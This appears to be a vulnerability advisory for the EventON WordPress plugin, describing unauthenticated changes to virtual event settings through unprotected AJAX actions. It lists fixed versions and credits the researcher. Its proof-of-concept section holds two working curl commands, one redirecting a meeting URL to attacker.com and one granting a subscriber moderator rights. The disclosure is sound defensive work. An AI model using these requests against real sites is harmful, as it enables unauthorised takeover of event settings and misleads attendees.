WordPress Plugin Vulnerabilities

EventON (Free < 2.2.9, Premium < 4.5.9) - Unauthenticated Virtual Event Settings Update

Description

The plugins do not have authorisation and CSRF in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details etc

Proof of Concept

To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:

curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'

To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:

curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'

v4.5.8 of the premium plugin added capability and CRSF checks, however the nonce verification is flawed, still allowing the issue to be exploited via CSRF

Affects Plugins

Fixed in 4.5.9
Fixed in 2.2.9

References

Classification

Type
NO AUTHORISATION
CWE

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes

Timeline

Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-02-02 (about 3 months ago)

Other